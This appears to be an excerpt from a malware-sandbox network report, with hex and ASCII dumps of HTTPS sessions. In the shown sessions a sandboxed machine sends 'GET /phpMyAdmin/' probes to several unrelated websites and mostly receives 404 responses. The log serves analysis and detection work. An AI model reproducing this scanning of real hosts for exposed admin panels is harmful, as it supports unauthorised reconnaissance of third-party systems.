                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC521INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6e 61 5f 6e 65 77 3d 31 3b 20 65 78 70 69 72 65 73 3d 54 75 65 2c 20 30 36 2d 46 65 62 2d 32 30 32 34 20 31 31 3a 31 36 3a 31 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 38 36 34 30 30 3b 20 70 61 74 68 3d 2f 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 35 63 67 4f 4b 52 44 36 67 54 68 6a 61 42 54 70 6a 4d 4f 36 4a 77 4d 59 79 74 72 4d 64 57 52 63 4a 59 5a 48 35 35 49 79 47 64 75 59 38 4c 48 75 39 39 25 32 42 62 33 62 54 6d 63 48 36 68 58 70 39 4a 4e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: set-cookie: na_new=1; expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; path=/CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5cgOKRD6gThjaBTpjMO6JwMYytrMdWRcJYZH55IyGduY8LHu99%2Bb3bTmcH6hXp9JN
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 31 66 66 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 72 69 6f 72 50 6c 75 73 20 7c 20 57 61 72 72 69 6f 72 50 6c 75 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 20 3a 20 59 6f 75 72 20 50 72 6f 66 69 74 20 69 73 20 4f 75 72 20 42 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ffe<!DOCTYPE html><html lang="en"><head><title>WarriorPlus | WarriorPlus</title><meta property="og:type" content="website"><meta property="og:title" content="WarriorPlus"><meta property="og:site_name" content="WarriorPlus : Your Profit is Our Bu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 30 2c 6f 62 66 75 73 63 61 74 65 3a 76 6f 69 64 20 30 2c 6a 73 65 72 72 6f 72 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSec
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 7d 7d 2c 70 3d 7b 7d 2c 67 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 67 29 3b 69 66 28 21 70 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 70 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !0,harvestTimeSeconds:10,autoStart:!0}}},p={},g="All configuration objects require an agent identifier!";function m(e){if(!e)throw new Error(g);if(!p[e])throw new Error("Configuration for ".concat(e," was never set"));return p[e]}function v(e,t){if(!e)thr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 76 65 72 73 69 6f 6e 3a 53 2e 71 34 2c 64 65 6e 79 4c 69 73 74 3a 76 6f 69 64 20 30 7d 2c 52 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 52 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 52 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ddEventListener,version:S.q4,denyList:void 0},R={};function D(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!R[e])throw new Error("Runtime for ".concat(e," was never set"));return R[e]}function O(e,t){if(!e)throw new Erro
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1353INData Raw: 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 7d 2c 33 38 35 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 46 4e 3a 28 29 3d 3e 73 2c 49 46 3a 28 29 3d 3e 75 2c 4e 6b 3a 28 29 3d 3e 66 2c 54 74 3a 28 29 3d 3e 63 2c 5f 41 3a 28 29 3d 3e 6f 2c 63 76 3a 28 29 3d 3e 68 2c 69 53 3a 28 29 3d 3e 61 2c 69 6c 3a 28 29 3d 3e 6e 2c 75 78 3a 28 29 3d 3e 64 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 6c 7d 29 3b 63 6f 6e 73 74 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0.0-alpha.11"},385:(e,t,r)=>{"use strict";r.d(t,{FN:()=>s,IF:()=>u,Nk:()=>f,Tt:()=>c,_A:()=>o,cv:()=>h,iS:()=>a,il:()=>n,ux:()=>d,v6:()=>i,w1:()=>l});const n="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefine
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 31 66 66 61 0d 0a 2e 61 73 73 69 67 6e 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 2c 69 29 2c 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6c 65 74 5b 74 2c 72 5d 3d 65 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 69 6e 63 6c 75 64 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 72 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 6e 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 75 2c 52 3a 28 29 3d 3e 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ffa.assign(this.sharedContext,i),Object.entries(e).forEach((e=>{let[t,r]=e;Object.keys(i).includes(t)&&(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,r)=>{"use strict";r.d(t,{L:()=>u,R:()=>c
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 29 7b 76 61 72 20 6e 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 66 3d 21 31 3b 74 72 79 7b 66 3d 31 36 3d 3d 3d 72 2e 6c 65 6e 67 74 68 26 26 28 30 2c 6f 2e 4f 50 29 28 72 29 2e 69 73 6f 6c 61 74 65 64 42 61 63 6b 6c 6f 67 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 68 3d 7b 6f 6e 3a 67 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 67 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6e 5b 65 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 72 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 72 5b 69 5d 3d 3d 3d 74 26 26 72 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =function e(t,r){var n={},s={},u={},f=!1;try{f=16===r.length&&(0,o.OP)(r).isolatedBacklog}catch(e){}var h={on:g,addEventListener:g,removeEventListener:function(e,t){var r=n[e];if(!r)return;for(var i=0;i<r.length;i++)r[i]===t&&r.splice(i,1)},emit:function(
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 28 6f 3d 22 66 65 61 74 75 72 65 22 29 2c 65 7c 7c 28 65 3d 6e 2e 45 29 3b 76 61 72 20 61 3d 74 5b 6f 5d 3d 74 5b 6f 5d 7c 7c 7b 7d 3b 28 61 5b 72 5d 3d 61 5b 72 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 65 2c 69 5d 29 7d 7d 2c 33 32 33 39 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 62 50 3a 28 29 3d 3e 73 2c 69 7a 3a 28 29 3d 3e 63 2c 6d 24 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 6e 3d 72 28 33 38 35 29 3b 6c 65 74 20 69 3d 21 31 2c 6f 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 6f 3d 21 30 2c 21 31 7d 7d 3b 6e 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: (o="feature"),e||(e=n.E);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},3239:(e,t,r)=>{"use strict";r.d(t,{bP:()=>s,iz:()=>c,m$:()=>a});var n=r(385);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventLis


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                153192.168.2.66385745.60.0.44443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC414OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzv
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC356INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 32-27693990-27694186 NNNY CT(119 138 0) RT(1707131768430 1678) q(0 0 0 -1) r(0 1) U24
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1096INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC149INData Raw: 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ou are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                154192.168.2.6634263.134.125.175443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC190OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 7e51c86663c7b523fa199cebb69dfc45
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                155192.168.2.6631243.141.96.53443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                156192.168.2.663389172.67.170.147443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC568INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fHNpvv4Bwpgi0SRkZIE5qxU9OhTs1h9ch5BZmyd5PC9pSDNwl8XXx4dDYwesaUwPvCMWoqoY324991cqkQBWQIg8mY71MhgKhG03j6PglZUJ1wHDOXJ6MHxHIWakTAnPMPjG7B9Y0xE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5cd91a0701-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
